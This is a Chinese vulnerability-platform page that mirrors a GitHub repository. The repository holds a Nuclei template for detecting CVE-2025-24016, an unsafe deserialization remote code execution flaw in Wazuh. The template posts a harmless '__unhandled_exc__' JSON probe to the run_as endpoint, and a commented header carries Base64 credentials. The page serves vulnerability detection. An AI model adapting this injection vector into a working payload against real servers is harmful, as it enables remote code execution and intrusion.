漏洞平台

POC详情： c4d655b54017657fc1205124fb7ca047d8a29c91

来源

https://github.com/huseyinstif/CVE-2025-24016-Nuclei-Template

关联漏洞

标题： Wazuh 代码问题漏洞 (CVE-2025-24016)
描述：Wazuh是Wazuh开源的一个应用软件。用于收集，汇总，索引和分析安全数据，帮助组织检测入侵，威胁和行为异常。 Wazuh 4.4.0至4.9.1之前版本存在代码问题漏洞，该漏洞源于分布式API的不安全反序列化，允许攻击者实现远程代码执行。

介绍

# CVE-2025-24016 Wazuh Unsafe Deserialization RCE Detection

This repository contains a Nuclei template to detect the unsafe deserialization vulnerability in Wazuh servers, identified as **CVE-2025-24016**.

## Template Details

```yaml
id: wazuh-unsafe-deserialization
info:
  name: "Wazuh Unsafe Deserialization RCE Detection"
  author: "Hüseyin TINTAŞ"
  severity: critical
  description: |
    This template detects an unsafe deserialization vulnerability in Wazuh servers.
    The DistributedAPI deserializes JSON data using as_wazuh_object. If an attacker injects
    a malicious object (via __unhandled_exc__), arbitrary Python code execution can be achieved.
    Instead of triggering a shutdown (e.g. via exit), this template uses a non-existent class 
    ("NotARealClass") to generate a NameError. A NameError in the response indicates that the 
    payload reached the vulnerable deserialization function.
  tags: wazuh, deserialization, rce, unsafe, cve, cve-2025-24016
  reference:
    - https://documentation.wazuh.com/
requests:
  - method: POST
    path:
      - "{{BaseURL}}/security/user/authenticate/run_as"
    headers:
      Content-Type: application/json
      # If needed, uncomment the following line for authentication (Base64 encoded "wazuh-wui:MyS3cr37P450r.*-")
      # Authorization: "Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg=="
    body: '{"__unhandled_exc__":{"__class__": "NotARealClass", "__args__": []}}'
    matchers:
      - type: status
        status:
          - 500
      - type: word
        part: body
        words:
          - "NameError"
```

## Usage

```bash
nuclei -t CVE-2025-24016.yaml -u http://example.com
```

## Contact

For any inquiries or further information, you can reach out to me through:

- [LinkedIn](https://www.linkedin.com/in/huseyintintas/)
- [Twitter](https://twitter.com/1337stif)

文件快照


 [4.0K]  /data/pocs/c4d655b54017657fc1205124fb7ca047d8a29c91
├── [1.3K]  CVE-2025-24016.yaml
└── [1.8K]  README.md

0 directories, 2 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。